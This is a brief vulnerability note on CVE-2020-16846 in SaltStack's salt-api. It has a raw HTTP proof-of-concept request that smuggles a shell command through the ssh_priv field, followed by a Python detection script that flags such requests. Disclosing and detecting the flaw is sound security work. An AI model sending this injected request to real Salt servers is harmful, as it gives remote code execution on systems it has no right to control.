537 B / 2021-05-21 09:14:38
# CVE-2020-16846 SaltStack Remote Code Execution Vulnerability
PoC:

```
POST /run HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0
Accept: application/x-yaml
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 87

token=12312&client=ssh&tgt=pyn3rd&fun=a&roster=qwe&ssh_priv=aaa%26%20open%20-a%20Calculator
```
![](media/16097302977098/16097303099460.jpg)
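For detection, the request shape in the PoC above (a form-encoded `POST /run` with `client=ssh` and shell metacharacters in `ssh_priv`) can be matched in proxy or WAF captures. The following is an added example, not part of the original note or of SaltStack's code; the function names, the metacharacter set and the benign sample request are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs

# Characters that should never appear in a private-key file path (assumed set).
SHELL_META = re.compile(r"[;&|`$<>(){}\\\n\r]")
# Fields of the /run body inspected when client=ssh (assumption: only ssh_priv,
# the parameter used in the PoC above).
PATH_FIELDS = ("ssh_priv",)

def parse_request(raw: str):
    """Split a raw HTTP request into (method, path, headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return method, path, headers, body.strip()

def inspect_run_request(raw: str):
    """Return findings for a salt-api request; an empty list means nothing flagged."""
    method, path, headers, body = parse_request(raw)
    if method != "POST" or path.split("?")[0].rstrip("/") != "/run":
        return []
    if "x-www-form-urlencoded" not in headers.get("content-type", ""):
        return []  # JSON/YAML bodies are out of scope for this sketch
    form = parse_qs(body, keep_blank_values=True)  # also percent-decodes values
    if "ssh" not in form.get("client", []):
        return []
    findings = []
    for field in PATH_FIELDS:
        for value in form.get(field, []):
            hits = sorted(set(SHELL_META.findall(value)))
            if hits:
                findings.append((field, value, hits))
    return findings

# POC reuses the body from the PoC above; BENIGN is a constructed sample.
HDR = ("POST /run HTTP/1.1\nHost: 127.0.0.1:8000\n"
       "Content-Type: application/x-www-form-urlencoded\n\n")
POC = HDR + ("token=12312&client=ssh&tgt=pyn3rd&fun=a&roster=qwe"
             "&ssh_priv=aaa%26%20open%20-a%20Calculator")
BENIGN = HDR + ("token=12312&client=ssh&tgt=web1&fun=test.ping"
                "&ssh_priv=/etc/salt/pki/master/ssh/salt-ssh.rsa")

if __name__ == "__main__":
    for name, req in (("poc", POC), ("benign", BENIGN)):
        print(name, inspect_run_request(req))
```

A match here is a detection signal only; the fix is the patched release described in the vendor advisory.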
References:

- https://www.saltstack.com/blog/on-november-3-2020-saltstack-publicly-disclosed-three-new-cves/
- https://forum.ywhack.com/thread-114703-1-4.html